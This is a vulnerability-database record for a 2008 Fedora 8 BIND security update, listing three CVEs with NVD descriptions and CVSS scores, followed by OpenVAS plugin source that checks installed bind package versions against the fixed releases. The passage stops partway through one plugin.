ID: FEDORA:M69LMAOI027921
Type: fedora
Reporter: Fedora
Modified: 2008-07-09T21:48:40
Description
BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly.
{"id": "FEDORA:M69LMAOI027921", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-28.P1.fc8", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "published": "2008-07-09T21:48:40", "modified": "2008-07-09T21:48:40", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447"], "lastseen": "2020-12-21T08:17:49", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6283", "CVE-2008-1447", "CVE-2008-0122"]}, {"type": "openvas", "idList": ["OPENVAS:870118", "OPENVAS:861104", "OPENVAS:1361412562310855101", "OPENVAS:860119", "OPENVAS:1361412562310122582", "OPENVAS:860151", "OPENVAS:1361412562310870118", "OPENVAS:860907", "OPENVAS:855451", "OPENVAS:1361412562310855451"]}, {"type": "nessus", "idList": ["SOLARIS8_109152.NASL", "SOLARIS8_X86_109327.NASL", "FEDORA_2008-0904.NASL", "SOLARIS8_109326.NASL", "REDHAT-RHSA-2008-0300.NASL", "FEDORA_2008-0903.NASL", "SL_20080521_BIND_ON_SL5_X.NASL", "FEDORA_2007-4658.NASL", "FEDORA_2007-4655.NASL", "FEDORA_2008-6281.NASL"]}, {"type": "f5", "idList": ["SOL8578", "SOL8938"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0300"]}, {"type": "redhat", "idList": ["RHSA-2008:0300"]}, {"type": "fedora", "idList": ["FEDORA:M0MG2IGT000424", "FEDORA:LBKJNVQ8025472", "FEDORA:EB89E20852E", "FEDORA:M69LJTSU027591", "FEDORA:M0MG2IGR000424"]}, {"type": "cert", "idList": ["VU:203611"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8571", "SECURITYVULNS:DOC:18862"]}, {"type": "seebug", "idList": ["SSV:9168", "SSV:17308", "SSV:9178", 
"SSV:2853"]}, {"type": "nmap", "idList": ["NMAP:DNS-RANDOM-TXID.NSE"]}, {"type": "slackware", "idList": ["SSA-2008-191-02"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68471"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1605-1:9D185", "DEBIAN:DSA-1623-1:F6633"]}, {"type": "suse", "idList": ["SUSE-SA:2008:033"]}, {"type": "ubuntu", "idList": ["USN-627-1"]}, {"type": "centos", "idList": ["CESA-2008:0533-03"]}], "modified": "2020-12-21T08:17:49", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-12-21T08:17:49", "rev": 2}, "vulnersScore": 7.3}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "8", "arch": "any", "packageName": "bind", "packageVersion": "9.5.0", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"cve": [{"lastseen": "2020-10-03T11:45:55", "description": "Red Hat Enterprise Linux 5 and Fedora install the Bind /etc/rndc.key file with world-readable permissions, which allows local users to perform unauthorized named commands, such as causing a denial of service by stopping named.", "edition": 3, "cvss3": {}, "published": "2007-12-18T01:46:00", "title": "CVE-2007-6283", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6283"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5.0", "cpe:/o:redhat:fedora_core:*"], "id": "CVE-2007-6283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6283", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:fedora_core:*:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:20", "description": "Off-by-one error in the inet_network function in libbind in ISC BIND 9.4.2 and earlier, as used in libc in FreeBSD 6.2 through 7.0-PRERELEASE, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted input that triggers memory corruption.", "edition": 6, "cvss3": {}, "published": "2008-01-16T02:00:00", "title": "CVE-2008-0122", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0122"], "modified": "2019-08-01T12:12:00", "cpe": ["cpe:/a:isc:bind:9.4.2"], "id": "CVE-2008-0122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0122", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:58", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860151", "href": "http://plugins.openvas.org/nasl.php?oid=860151", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-6281", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-6281\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00458.html\");\n script_id(860151);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:01:32 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-6281\");\n script_cve_id(\"CVE-2008-1447\", \"CVE-2008-0122\", \"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2008-6281\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : 
tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~28.P1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870118", "href": "http://plugins.openvas.org/nasl.php?oid=870118", "type": "openvas", "title": "RedHat Update for bind RHSA-2008:0300-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2008:0300-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\n Name System (DNS) protocols. BIND includes a DNS server (named); a resolver\n library (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating correctly.\n\n It was discovered that the bind packages created the "rndc.key" file with\n insecure file permissions. This allowed any local user to read the content\n of this file. A local user could use this flaw to control some aspects of\n the named daemon by using the rndc utility, for example, stopping the named\n daemon. This problem did not affect systems with the bind-chroot package\n installed. (CVE-2007-6283)\n \n A buffer overflow flaw was discovered in the "inet_network()" function, as\n implemented by libbind. An attacker could use this flaw to crash an\n application calling this function, with an argument provided from an\n untrusted source. (CVE-2008-0122)\n \n As well, these updated packages fix the following bugs:\n \n * when using an LDAP backend, missing function declarations caused\n segmentation faults, due to stripped pointers on machines where pointers\n are longer than integers.\n \n * starting named may have resulted in named crashing, due to a race\n condition during D-BUS connection initialization. This has been resolved in\n these updated packages.\n \n * the named init script returned incorrect error codes, causing the\n "status" command to return an incorrect status. 
In these updated packages,\n the named init script is Linux Standard Base (LSB) compliant.\n \n * in these updated packages, the "rndc [command] [zone]" command, where\n [command] is an rndc command, and [zone] is the specified zone, will find\n the [zone] if the zone is unique to all views.\n \n * the default named log rotation script did not work correctly when using\n the bind-chroot package. In these updated packages, installing\n bind-chroot creates the symbolic link "/var/log/named.log", which points\n to "/var/named/chroot/var/log/named.log", which resolves this issue.\n \n * a previous bind update incorrectly changed the permissions on the\n "/etc/openldap/schema/dnszone.schema" file to mode 640, instead of mode\n 644, which resulted in OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n \n * the "checkconfig" parameter was missing in the named usage report. For\n example, running the "service named" command did not return "checkconfi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"bind on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00020.html\");\n script_id(870118);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0300-02\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_name( \"RedHat Update for bind RHSA-2008:0300-02\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860119", "href": "http://plugins.openvas.org/nasl.php?oid=860119", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-0903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-0903\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# 
(or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-January/msg00781.html\");\n script_id(860119);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:12:43 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-0903\");\n script_cve_id(\"CVE-2008-0122\", \"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2008-0903\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora 
Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870118", "type": "openvas", "title": "RedHat Update for bind RHSA-2008:0300-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2008:0300-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\n Name System (DNS) protocols. BIND includes a DNS server (named); a resolver\n library (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating correctly.\n\n It was discovered that the bind packages created the "rndc.key" file with\n insecure file permissions. This allowed any local user to read the content\n of this file. A local user could use this flaw to control some aspects of\n the named daemon by using the rndc utility, for example, stopping the named\n daemon. This problem did not affect systems with the bind-chroot package\n installed. (CVE-2007-6283)\n \n A buffer overflow flaw was discovered in the "inet_network()" function, as\n implemented by libbind. An attacker could use this flaw to crash an\n application calling this function, with an argument provided from an\n untrusted source. (CVE-2008-0122)\n \n As well, these updated packages fix the following bugs:\n \n * when using an LDAP backend, missing function declarations caused\n segmentation faults, due to stripped pointers on machines where pointers\n are longer than integers.\n \n * starting named may have resulted in named crashing, due to a race\n condition during D-BUS connection initialization. 
This has been resolved in\n these updated packages.\n \n * the named init script returned incorrect error codes, causing the\n "status" command to return an incorrect status. In these updated packages,\n the named init script is Linux Standard Base (LSB) compliant.\n \n * in these updated packages, the "rndc [command] [zone]" command, where\n [command] is an rndc command, and [zone] is the specified zone, will find\n the [zone] if the zone is unique to all views.\n \n * the default named log rotation script did not work correctly when using\n the bind-chroot package. In these updated packages, installing\n bind-chroot creates the symbolic link "/var/log/named.log", which points\n to "/var/named/chroot/var/log/named.log", which resolves this issue.\n \n * a previous bind update incorrectly changed the permissions on the\n "/etc/openldap/schema/dnszone.schema" file to mode 640, instead of mode\n 644, which resulted in OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n \n * the "checkconfig" parameter was missing in the named usage report. For\n example, running the "service named" command did not return "checkconfi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"bind on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00020.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870118\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0300-02\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_name( \"RedHat Update for bind RHSA-2008:0300-02\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 